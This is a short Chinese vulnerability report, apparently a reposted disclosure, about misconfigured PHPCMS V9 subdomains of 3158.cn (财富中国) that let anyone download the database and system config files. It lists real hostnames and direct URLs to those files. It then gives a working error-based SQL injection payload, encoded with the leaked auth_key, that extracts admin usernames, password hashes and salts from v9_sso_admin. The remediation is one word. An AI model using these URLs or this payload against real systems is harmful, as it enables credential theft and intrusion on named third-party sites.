财富中国多分站任意文件下载及引起的注入 - 网

财富中国 cn 域所有使用V9的站点，由于配置不当，造成配置文件 下载 ，从而造成信息泄漏及SQL注入等问题。

站点大概有：

zx.sichuan.3158.cn

zx.hlj.3158.cn

zx.henan.3158.cn

zx.ln.3158.cn

zx.guangzhou.3158.cn

zx.jiangsu.3158.cn

 

等

http://zx.hlj.3158.cn/caches/configs/database.php

http://zx.hlj.3158.cn/caches/configs/system.php

直接下载

 

 

得知 auth_key 后，可以造成多处SQL注入。

 

 

 

 

die(sys_auth(sys_auth("1' and (select 1 from(select count(*),concat(0x7c,(select concat(username,0x7c,password,0x7c,encrypt) from v9_sso_admin limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#\tp",'ENCODE',$auth_key )));

 

修复方案：

配置

查看更多关于财富中国多分站任意文件下载及引起的注入 - 网的详细内容...